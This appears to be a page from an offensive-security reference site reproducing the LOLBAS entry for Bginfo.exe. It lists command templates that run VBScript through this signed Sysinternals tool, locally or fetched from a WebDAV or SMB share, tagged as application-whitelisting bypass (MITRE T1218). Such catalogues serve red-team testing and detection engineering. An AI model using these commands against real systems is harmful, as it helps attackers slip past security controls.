🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Bginfo.exe

Bginfo.exe

Background Information Utility included with SysInternals Suite

AWL Bypass

Local execution of VBScript

bginfo.exe {PATH:.bgi} /popup /nolicprompt

Execute VBscript code that is referenced within the specified .bgi file. — MITRE: T1218 — Privileges: User

Remote execution of VBScript

\\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt

Execute bginfo.exe from a WebDAV server. — MITRE: T1218 — Privileges: User

Remote execution of VBScript

\\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt

This style of execution may not longer work due to patch. — MITRE: T1218 — Privileges: User

Execute

Local execution of VBScript

bginfo.exe {PATH:.bgi} /popup /nolicprompt

Execute VBscript code that is referenced within the specified .bgi file. — MITRE: T1218 — Privileges: User

Remote execution of VBScript

\\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt

Execute bginfo.exe from a WebDAV server. — MITRE: T1218 — Privileges: User

Remote execution of VBScript

\\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt

This style of execution may not longer work due to patch. — MITRE: T1218 — Privileges: User